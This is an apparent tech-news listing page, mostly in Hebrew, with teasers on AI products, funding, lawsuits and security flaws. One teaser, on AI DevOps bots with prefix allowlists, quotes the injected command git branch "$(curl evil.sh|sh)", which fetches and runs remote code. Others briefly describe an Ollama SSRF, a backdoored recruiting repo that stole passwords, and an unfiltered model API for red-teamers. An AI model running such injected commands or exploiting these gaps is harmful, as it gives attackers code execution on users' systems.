GyaanSetu Editorial

Editorial Team

The GyaanSetu editorial team publishes practical, AI-assisted guides across AI, web development and business.

מוריד המודלים של Ollama מאפשר לתוקפים ללא אימות להשיג מטא-דאטה של ענן באמצעות SSRF

באג ה-SSRF נותר בעינו בגרסה 0.33.2 של Ollama מכיוון שמוריד מודל ה-tensor משתמש בלקוח HTTP נפרד שמתעלם ממנגנון הגנת ההפניה (redirect guard) שנוסף עבור CVE-2026-5530, מה שמאפשר לתוקפים להפנות הורדות לכל כתובת נגישה.

JavaScript · 3 min read

גוגל מבטיחה 400 מגוואט של אנרגיה גיאותרמית ביוטה להזנת בינה מלאכותית עד 2028

הסכם רכישת החשמל עם המערכת הגיאותרמית המשופרת של Fervo יתחיל לספק חשמל בשנת 2028, ויספק לגוגל עומס בסיס קבוע ונטול פחמן התואם את הביקוש הבלתי פוסק של אימון בינה מלאכותית, תוך הימנעות מאגירת סוללות יקרה.

AI · 2 min read

Abliteration.ai Offers Pay-Per-Request Unfiltered GLM-5.3 API for Red-Teamers

The startup’s hosted API lets anyone with a credit-card query an unrestricted version of GLM-5.3, eliminating the need for local GPUs or custom code. While security teams praise the tool for realistic attack simulations, researchers warn it can also churn out step-by-step instructions for cyber-crim

AI · 4 min read

חשיפת בוטים של DevOps מבוססי AI: רשימות לבנות של קידומות מאפשרות לתוקפים להריץ קוד שרירותי

CVE-2026-22708 מדגים כי סוכנים הבודקים רק את הטוקן הראשון של פקודה עלולים להוטעות על ידי מטעים (payloads) המוסתרים בתוך ארגומנטים — למשל, git branch "$(curl evil.sh|sh)" — מה שמעניק לתוקפים את אותן ההרשאות שיש לבוט האוטומציה.

JavaScript · 4 min read

גוגל משיקה Live Voice מבוסס Gemini ל-Gmail, Docs ו-Keep בנייד

מצבי ה-Live החדשים, המבוססים על מודל ה-Gemini של גוגל, מאפשרים למשתמשים לדבר באופן טבעי עם Gmail, Docs ו-Keep במכשירי iOS ואנדרואיד, עם תמלול בזמן אמת ומעברים חלקים בין שאילתות, אך כרגע הם מוגבלים לאנגלית ולמנויי AI פרימיום.

AI · 2 min read

מיקרוסופט משיקה את Foundry Toolbox, המפחיתה את השימוש בטוקנים של כלים בעד 94%

Foundry Toolbox מאחדת את ניהול האישורים, ניהול הגרסאות ואכיפת המדיניות לנקודת קצה אחת, בעוד ש-Tool Search מצמצמת פרומפטים לרשימה קצרה ומדורגת, מה שמפחית את טוקני הקלט בעד 94% במבחן ביצועים של 600 כלים ומשפר את דיוק בחירת הכלים.

AI · 3 min read

גוגל רוכשת את הצוות של Relay ומפסיקה את פעילות פלטפורמת אוטומציית ה-AI בן לילה

חטיבת כרום של גוגל רכשה את המהנדסים של Relay במסגרת acquihire, ולא את התוכנה עצמה. העסקה משמעותה ששירות אוטומציית ה-AI של Relay למכירות, תמיכה ותפעול יופסק באופן מיידי, מה שיאלץ את הלקוחות לייצא נתונים ולבנות מחדש את תהליכי העבודה שלהם.

AI · 2 min read

Justice Department’s Hemingway Analogy Fuels New Front in AI Copyright War

In an amicus brief filed in the New York Times case, the Justice Department argues that copying copyrighted text for model training isn’t infringement because the data never leaves the servers and model outputs rarely show substantial similarity, a stance that could spare AI firms from multibillion-

AI · 6 min read

OpenAI מחברת את ChatGPT Health למערכת ה-EHR של Epic, ומאפשרת גישה לנתונים של 325 מיליון מטופלים

החיבור במצב "קריאה בלבד" מאפשר לרופאים למשוך תוצאות מעבדה, הערות ומידע על תרופות ישירות לממשק ה-AI, בעוד שתוסף נתונים ציבוריים חדש מוסיף מחקר בזמן אמת מ-PubMed, ClinicalTrials.gov וממאגרי מידע של תרופות, וכל זאת תחת הסכם שותף עסקי (Business Associate Agreement).

AI · 2 min read

Google Pics משיקה בתוך Workspace, ומציבה את ה-Prompt-AI אל מול התבניות של Canva

מבוסס על מודל ה-Nano Banana הקנייני של גוגל, Pics מאפשרת למשתמשים להקליד הנחיה (prompt) וליצור או לערוך באופן מיידי תמונות באיכות גבוהה ישירות בתוך Docs, Slides ו-Drive, תוך מתן אפשרות לתיקונים שיתופיים בזמן אמת ולמגוון גרסאות מבלי לצאת מסביבת העבודה.

AI · 5 min read

אפל דורשת גישה מיידית למקבוק לאחר שהאשימה את OpenAI במחיקת ראיות

בתביעה של אפל נטען כי המהנדס לשעבר צ'אנג ליאו הוריד תרשים מעגלים חסוי ודן בהשמדת יומני מערכת במחשב מקבוק בבעלות החברה. החברה טוענת כי הנתונים הזמניים במחשב הנייד עלולים להידרס, מה שהוביל לבקשה לחשיפת ראיות מואצת בהוראת בית משפט.

AI · 3 min read

HiddenLayer מגייסת 100 מיליון דולר בסבב B להגנה על סוכני AI ארגוניים

סבב ה-B, בהובלת Delta-v Capital ובשיתוף M12 של מיקרוסופט ומוגן סטנלי, יממן הרחבת מכירות, מחקר מעמיק יותר בנושא התקפות מולטי-מודאליות וחדירה לשוק ה-EMEA, זאת בזמן שה-ARR של HiddenLayer קופץ פי עשרה לרמה של עשרות מיליוני דולרים.

AI · 5 min read

$550M Series C Pushes Wonderful to $5B Valuation in Six Months

The Israeli-Dutch startup has pivoted from multilingual customer-service bots to a model-agnostic AI operating system, deploying forward-deployed engineers on-site in 35+ countries. Backed by Insight Partners and a new stake from Salesforce, the $550M round will fund product development and global F

AI · 2 min read

Anthropic מקצצת ב-80% מהפרומפט של Claude Code ושומרת על דיוק בכתיבת קוד

Anthropic גילתה כי הסרת רוב הכללים מהפרומפט של המערכת לא פגעה בתוצרים של Claude Code, מה שמוכיח שמודלי שפה גדולים (LLMs) מודרניים יכולים להסיק סגנון ואילוצים מהוראה אחת בלבד, וכי ניתן לצמצם באופן דרמטי את תשתית הפרומפט (prompt scaffolding).

AI · 3 min read

Anthropic משחררת את ה-Model Context Protocol כקוד פתוח, 'USB-C' עבור סוכני AI

פרוטוקול ה-Model Context (MCP) מציג ממשק אחיד המאפשר לסוכני AI לבצע שאילתות למסדי נתונים, כלי ניטור, מאגרי קוד ועוד. באמצעות הגדרת משאבים, כלים והנחיות (prompts), שרת MCP בודד יכול להחליף עשרות מתאמים (adapters) מותאמים אישית, ולהנגיש נתונים באופן מיידי לכל לקוח תואם Claude.

AI · 3 min read

דליפת CoopCycle חושפת אלפי כתובות לקוחות באמצעות נקודת קצה GET לא מאובטחת

היעדר בדיקת אבטחה בנקודת הקצה של אוסף הכתובות `/api/stores/{id}/addresses` אפשר לכל משתמש CoopCycle מחובר למנות מזהי חנויות ולאסוף שמות מלאים, כתובות רחוב ומיקודים, ובכך לפגוע בפרטיות של מספר קואופרטיבים.

PHP · 3 min read

מהרשטרה מבטלת את מבחן ההינדי שקיים מזה 70 שנה ומפחיתה עלויות גיוס

המדינה דורשת כעת רק הוכחה לשליטה בשפת המראתי — שכבר משמשת בכל מסמך רשמי — מה שמאפשר למועמדים לוותר על הסמכה נפרדת בשפת ההינדי, ומבטיח תהליכי גיוס מהירים יותר והוצאות מנהלתיות נמוכות יותר.

Bharat · 1 min read

Claude Fable 5.1 Benchmarks: Every Number Compared

Claude Fable 5.1 Benchmarks: Every Number Compared Anthropic released Claude Fable 5.1 on 1 September 2026. The numbers show huge leaps in specific areas. The headline is the Term…

AI · 3 min read

Anthropic Cuts Cache-Read Costs 75%, Slashing Agent Bills 45%

Anthropic’s Fable 5.1 reduces cache-read fees by 75%, trimming overall agent operating costs up to 45%. The cut lets autonomous models run for hours—or days—without constant human supervision, opening new production use cases.

AI · 3 min read

מופעי Artifactory החשופים לאינטרנט כבר נמצאים תחת תקיפה, כך מזהירים חוקרים

חברת JFrog חשפה ב-28 באוגוסט את פרצת האבטחה CVE-2026-82329, באג עם ציון CVSS של 9.8 המאפשר לתוקפים לזייף טוקנים של מנהל מערכת ללא צורך בפרטי גישה כלשהם. מודיעין איומים מאשר כי הניצול כבר פוגע בהתקנות מקומיות (on-prem) החשופות לאינטרנט, ועדכוני אבטחה זמינים עבור שש גרסאות מושפעות.

WebDev · 2 min read

Beatport אוסרת על רצועות שנוצרו במלואן על ידי בינה מלאכותית, ומתייגת שירים היברידיים

Beatport תדחה באופן אוטומטי העלאות שהן נוצרות בעיקר על ידי בינה מלאכותית, אך היא עדיין תקבל רצועות המשתמשות בבינה מלאכותית ככלי, בתנאי שהן מסומנות בבירור ככאלה. המהלך מגיע בעקבות סקר שבו 77% מהמשתמשים העדיפו מוזיקה שנוצרה על ידי בני אדם.

AI · 3 min read

WSJ Drops Mandatory AI Disclosure, Forces Platform Builders to Rethink Rules

After an op-ed admitted using AI as a “calculator for arguments,” the Wall Street Journal stopped requiring disclosure of AI tools in opinion pieces. The move compels developers of editorial platforms to add configurable policies, role-based permissions, AI-function tagging, and auditable human sign

AI · 3 min read

משטרת דלהי עצרה זוג מרע ואישה מרגלים של ה-ISI בגין רשת כרטיסי SIM מראש

הזוג, מוחמד סאהיל וסמירה, ניהלו לכאורה תא בגיבוי ה-ISI שהשתמש במנות של כרטיסי SIM חד-פעמיים כדי להבריח תעודות זהות אישיות וחומר מסווג לאנשי קשר בפקיסטן, מה שהוביל לסריקת אבטחה בכל רחבי העיר.

Bharat · 2 min read

מבחן 27 הבאגים של CodeVetter מראה יכולת זיהוי, אך לא מוכנות לעולם האמיתי

המבחן מריץ 27 מקרים סינתטיים ומתעד הצלחה או כישלון, מה שמספק בדיקת תקינות מהירה לכיסוי תקלות, אך הוא מתעלם מזמן ריצה, עלויות מחשוב, מגוון שפות ותיקוף של מאגרים חיים (live-repo), ולכן הציון אינו מהווה ערובה לשימוש בסביבת ייצור.

AI · 2 min read

Google Gemini Notebook Taps 100,000 Play Books, Lets Users Remix Content

In a live demo, Google Labs editorial director Steven Johnson fed Michael Pollan’s *Food Rules* into Gemini Notebook and got a full week-long menu with grocery list, while Kim Scott’s *Radical Candor* produced a step-by-step performance-review script—all without leaving the app.

AI · 6 min read

מאגר גיוס מזויף הזרים דלת אחורית ב-PostCSS וגנב סיסמאות כרום תוך דקות

משרת מהנדס בכיר מזויפת שלחה מאגר GitHub שנראה מקצועי; הרצת סקריפט ההתחלה שלו הפעילה קוד נסתר ב-postcss.config.js, שפנה לשרת C2, הוריד מטען (payload) של שלב שני, ואסף את כל סיסמאות הכרום המאוחסנות ב-macOS keychain.

WebDev · 3 min read

בינה מלאכותית עלולה להשתלט על רשתות חשמל ובתי חולים, כך טוענים OpenAI ו-100 מובילי טכנולוגיה

הקואליציה מציינת התראות אחרונות של סוכנויות בארה"ב לפיהן האקרים כבר השתמשו בבינה מלאכותית כדי ליצור קוד פריצה עבור בקרים מסוג Siemens S7, וקוראת לפיקוח של דירקטוריונים בחברות, למימון מחקר ממשלתי ולהגנות מבוססות בינה מלאכותית במחיר נגיש.

AI · 3 min read

מצב ה-AI של גוגל הופך לסוכן נסיעות מקיף, המזמין טיסות ומלונות באופן ישיר

מצב ה-AI המשודרג שואב נתונים מיותר מ-300 חברות תעופה ורשתות מלונות מרכזיות, מאפשר למשתמשים לעקוב אחר שינויים במחירים באמצעות התראות בדוא"ל, ומבצע הזמנות באמצעות תשלום ב-Google Pay, בעוד שהשותפים עדיין מטפלים בביצוע ההזמנות.

AI · 2 min read

אדובי משיקה גרסת בטא של עורך מבוסס בינה מלאכותית, המשלבת כלי הנחיות ושרטוט

ממשק הבטא מאחד עריכה מבוססת הנחיות, הסרת רקע והרחבת תמונה לסרגל כלים אחד, בעוד שכלי הסימון החדש מאפשר למשתמשים לצייר חצים, מברשות וצורות כדי להנחות את הבינה המלאכותית, ובכך חוסך את הצורך בהנדסת הנחיות מורכבת.

AI · 2 min read

בינה מלאכותית קולית בקנה מידה רחב: מה חושפות שיחות העסקים של הודו

בינה מלאכותית קולית בקנה מידה רחב: מה חושפות שיחות העסקים של הודו. בינה מלאכותית קולית בהודו עוברת מתיאוריה לפעילות יומיומית. DialNexa ניתחה למעלה ממיליון שיחות עסקיות מבוססות AI כדי לראות כיצד...

AI · 4 min read

ביקורת מראה: 64% מהאתרים המובילים באירופה אינם עומדים בכללי נגישות בסיסיים

הביקורת שבוצעה באתרים בעלי התנועה הגבוהה ביותר באיחוד האירופי מצאה כי בשני שלישים מהם חסרות תוויות ARIA חיוניות, 44% אינם עומדים ביחסי ניגודיות, ואתרים גדולים יותר נוטים פי שלושה להפר את תקני רמה A, מה שמעמיד אותם בסכנת אכיפה עוד לפני הגעת תקן WCAG 2.2.

WebDev · 3 min read

Claude מקבל דפדפן מובנה, והופך לסוכן אינטרנט אוטונומי

הדפדפן המובנה, שיושק השבוע עבור מסלולי ה-Pro, Max, Team ו-Enterprise של Anthropic, מאפשר ל-Claude לטעון דפים, ללחוץ על כפתורים ולהקליד בשדות בתוך אפליקציית שולחן העבודה, מה שמבטל את הצורך בפתרונות עקיפים של העתקה והדבקה ומאפשר אוטומציה באתרים ללא ממשקי API ציבוריים.

AI · 4 min read

GKE Adds Custom-Stage Rollout Sequencing to Control Upgrade Order

The new RolloutSequence object lets you define ordered stages using label selectors, upgrade the control plane first, run a configurable soak timer, then parallel-upgrade nodes before moving to the next stage, all with pause, force-complete and cancel actions.

AI · 3 min read